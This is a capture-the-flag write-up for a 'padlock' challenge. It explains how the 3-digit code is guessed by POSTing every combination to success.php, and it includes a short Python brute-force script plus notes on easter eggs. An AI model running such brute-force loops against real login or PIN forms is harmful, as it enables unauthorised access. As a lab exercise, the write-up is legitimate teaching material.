# CHALLENGE padlock

## Writeup
To get the flag, a 3-digit code has to be found. As 3 digits only offers 999 combinations, brute-force would be the way to go.
In the source code of `index.php`, we can find that for each try, a POST-request is sent to `success.php`. The post request contains 3 values: `try100`, `try10` and `try1`. In the brute-force we have to enumerate each value from 0 to 9. We can check each response for the flag by looking for `"IG{`. If we got a match the respons might contain a flag.

A simple brute-force program in Python would look like this:

```python
import requests

# change URL path
url = "success.php"

def checkForSolution(text):
    if text.find("IG{") == -1:
        return False
    else:
        substr = text.find("IG{")
        print(text[substr:text.find("}", substr) + 1])
        return True

def bruteForce():
    for h in range(10):
        for t in range(10):
            for u in range(10):
                param = {'try100': h, 'try10': t, 'try1': u}
                req = requests.post(url, data = param)
                print("try:", h, t, u)
                if checkForSolution(req.text):
                    return True

bruteForce()
```

## Easter eggs
In `robots.txt` a file `flag.txt` is disallowed, this file contains an ascii-art of a beautiful flag.
Trying combinations like '420' or '069' will redirect to a new page. Also a cookie is placed, as long as this cookie exists, the index page shows a 4-digit combination. However, this newly placed digit does not do anything.
The cookie placed contains a Base64-string.